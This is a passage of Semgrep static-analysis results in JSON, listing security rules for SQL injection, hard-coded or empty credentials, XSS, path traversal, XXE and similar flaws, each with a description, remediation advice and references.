identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","id":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","name":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","id":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","name":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","id":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","name":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"help":{"markdown":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root)\n - [https://github.com/hadolint/hadolint/wiki/DL3002](https://github.com/hadolint/hadolint/wiki/DL3002)\n","text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"helpUri":"https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root","id":"dockerfile.security.last-user-is-root.last-user-is-root","name":"dockerfile.security.last-user-is-root.last-user-is-root","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.last-user-is-root.last-user-is-root"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"help":{"markdown":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - [https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df](https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df)\n","text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics","id":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","name":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","properties":{"precision":"very-high","tags":["CWE-305: Authentication Bypass by Primary Weakness","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.local-biometrics.insecure-biometrics"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"help":{"markdown":"RSA keys should be at least 2048 bits based on NIST recommendation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","id":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","name":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"help":{"markdown":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls)\n - [https://docs.microsoft.com/en-us/azure/key-vault/general/network-security](https://docs.microsoft.com/en-us/azure/key-vault/general/network-security)\n","text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","id":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","name":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"help":{"markdown":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings)\n - [https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies](https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL)\n","text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","id":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","name":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec)\n - [https://guides.rubyonrails.org/security.html#command-line-injection](https://guides.rubyonrails.org/security.html#command-line-injection)\n","text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec","id":"ruby.lang.security.dangerous-exec.dangerous-exec","name":"ruby.lang.security.dangerous-exec.dangerous-exec","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-exec.dangerous-exec"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cannot determine what '$UNK' is and it is used with a ' which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"help":{"markdown":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss)\n - [https://owasp.org/www-community/attacks/DOM_Based_XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS)\n","text":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"helpUri":"https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss","id":"javascript.browser.security.dom-based-xss.dom-based-xss","name":"javascript.browser.security.dom-based-xss.dom-based-xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.dom-based-xss.dom-based-xss"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"help":{"markdown":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request)\n - [https://cwe.mitre.org/data/definitions/95.html](https://cwe.mitre.org/data/definitions/95.html)\n","text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","id":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","name":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint","id":"rust.rocket.sql.sqlx-taint.sqlx-taint","name":"rust.rocket.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express","id":"javascript.express.db.sqlite-express.sqlite-express","name":"javascript.express.db.sqlite-express.sqlite-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sqlite-express.sqlite-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","id":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","name":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"help":{"markdown":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls)\n - [https://golang.org/pkg/net/http/#ListenAndServeTLS](https://golang.org/pkg/net/http/#ListenAndServeTLS)\n","text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls","id":"go.lang.security.audit.net.use-tls.use-tls","name":"go.lang.security.audit.net.use-tls.use-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.use-tls.use-tls"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"help":{"markdown":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","id":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","name":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-file-permissions.insecure-file-permissions"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","id":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","name":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a 